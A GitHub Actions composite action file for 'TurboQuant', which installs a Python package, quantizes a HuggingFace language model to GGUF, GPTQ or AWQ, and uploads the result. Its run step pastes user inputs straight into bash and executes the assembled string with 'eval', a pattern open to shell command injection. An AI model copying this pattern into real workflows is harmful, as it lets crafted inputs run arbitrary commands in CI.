turboquant/action.yml at master · ShipItAndPray/turboquant · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
name: 'TurboQuant — Quantize LLM'
description: 'Compress any LLM up to 6x in one step. Quantize to GGUF, GPTQ, or AWQ and optionally push to HuggingFace Hub.'
author: 'ShipItAndPray'
branding:
  icon: 'zap'
  color: 'orange'

inputs:
  model:
    description: 'HuggingFace model ID or path to local model directory'
    required: true
  format:
    description: 'Output format: gguf, gptq, awq, or all'
    required: false
    default: 'gguf'
  bits:
    description: 'Quantization bits: 2, 3, 4, 5, or 8'
    required: false
    default: '4'
  target:
    description: 'Target platform: ollama, vllm, llamacpp, lmstudio (overrides format)'
    required: false
    default: ''
  push-to-hub:
    description: 'HuggingFace repo to upload quantized model (e.g. user/model-GGUF)'
    required: false
    default: ''
  eval:
    description: 'Run quality evaluation after quantization'
    required: false
    default: 'false'
  output:
    description: 'Output directory for quantized model'
    required: false
    default: './turboquant-output'
  hf-token:
    description: 'HuggingFace API token (required for --push-to-hub and gated models)'
    required: false
    default: ''

outputs:
  output-dir:
    description: 'Directory containing quantized model files'
    value: ${{ inputs.output }}
  report:
    description: 'Path to the JSON compression report'
    value: ${{ inputs.output }}/turboquant-report.json

runs:
  using: 'composite'
  steps:
    - name: Set up Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.11'

    - name: Install TurboQuant
      shell: bash
      run: |
        pip install --upgrade pip
        pip install turboquant
        # Install requested backends
        FORMAT="${{ inputs.format }}"
        TARGET="${{ inputs.target }}"
        if [ "$TARGET" = "ollama" ] || [ "$TARGET" = "llamacpp" ] || [ "$TARGET" = "lmstudio" ] || [ "$FORMAT" = "gguf" ]; then
          pip install turboquant[gguf] || echo "Warning: GGUF backend install failed"
        fi
        if [ "$TARGET" = "vllm" ] || [ "$FORMAT" = "gptq" ] || [ "$FORMAT" = "all" ]; then
          pip install turboquant[gptq] || echo "Warning: GPTQ backend install failed"
        fi
        if [ "$TARGET" = "vllm" ] || [ "$FORMAT" = "awq" ] || [ "$FORMAT" = "all" ]; then
          pip install turboquant[awq] || echo "Warning: AWQ backend install failed"
        fi

    - name: Configure HuggingFace token
      if: inputs.hf-token != ''
      shell: bash
      run: |
        echo "HF_TOKEN=${{ inputs.hf-token }}" >> $GITHUB_ENV
        huggingface-cli login --token ${{ inputs.hf-token }} --add-to-git-credential

    - name: Run TurboQuant
      shell: bash
      run: |
        CMD="turboquant ${{ inputs.model }}"
        CMD="$CMD --bits ${{ inputs.bits }}"
        CMD="$CMD --output ${{ inputs.output }}"

        # Target overrides format
        if [ -n "${{ inputs.target }}" ]; then
          CMD="$CMD --target ${{ inputs.target }}"
        else
          CMD="$CMD --format ${{ inputs.format }}"
        fi

        # Optional flags
        if [ "${{ inputs.eval }}" = "true" ]; then
          CMD="$CMD --eval"
        fi
        if [ -n "${{ inputs.push-to-hub }}" ]; then
          CMD="$CMD --push-to-hub ${{ inputs.push-to-hub }}"
        fi

        echo "Running: $CMD"
        eval $CMD

    - name: Upload artifacts
      if: always()
      uses: actions/upload-artifact@v4
      with:
        name: turboquant-output
        path: ${{ inputs.output }}
        retention-days: 30